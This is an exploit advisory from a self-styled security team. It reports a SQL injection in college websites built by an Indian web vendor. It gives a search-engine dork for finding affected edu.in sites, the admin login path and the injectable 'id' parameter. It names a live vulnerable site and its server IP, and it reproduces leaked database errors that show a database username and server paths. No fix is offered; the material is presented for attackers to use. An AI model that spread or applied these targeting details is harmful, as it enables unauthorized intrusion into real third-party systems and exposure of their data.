Anmoul Infomatics Pvt. Ltd India SQL Injection

1. #############################################################
2.  
3. # Exploit Title : Anmoul Infomatics Pvt. Ltd India SQL Injection Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 08/01/2019
7. # Vendor Homepage : anmoul.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Powered By Anmoul Infomatics Pvt. Ltd'' site:edu.in
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. #############################################################
16.  
17. # Admin Panel Login Path :
18. ************************
19.  
20. /admin/
21.  
22. # SQL Injection Exploit :
23. ************************
24.  
25. /src/db_conn.php?id=[SQL Injection]
26.  
27. #############################################################
28.  
29. # Example Vulnerable Site =>
30. ***************************
31.  
32. Note => (192.163.245.86) => There are 141 domains hosted on this server.
33.  
34. [+] dbmsdca.edu.in/src/db_conn.php?id=12%27 =>
35.  
36. [ Proof of Concept ] => archive.fo/xuBFL
37.  
38. #############################################################
39.  
40. # SQL Database Error :
41. **********************
42.  
43. Warning: mysql_pconnect(): Access denied for user
44. 'dbmsdcae_user'@'localhost' (using password: YES) in
45. /home2/dbmsdcaedu/public_html/src/db_conn.php on line 7
46. Error connecting to database.
47. Warning: mysql_select_db(): Access denied for user
48. ''@'localhost' (using password: NO) in /home2/dbmsdcaedu
49. /public_html/src/db_conn.php on line 12
50.  
51. Warning: mysql_select_db(): A link to the server could
52. not be established in
53. /home2/dbmsdcaedu/public_html/src/db_conn.php on line 12
54.  
55. Warning: mysql_connect(): Access denied for user
56. 'dbmsdcae_user'@'localhost' (using password: YES) in
57. /home2/dbmsdcaedu/public_html/src/db_conn.php on line 18
58.  
59. Warning: mysql_select_db(): Access denied for user
60. ''@'localhost' (using password: NO) in /home2/dbmsdcaedu
61. /public_html/src/db_conn.php on line 19
62.  
63. Warning: mysql_select_db(): A link to the server could not be
64. established in /home2/dbmsdcaedu/public_html/src
65. /db_conn.php on line 19
66.  
67. #############################################################
68.  
69. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
70.  
71. #############################################################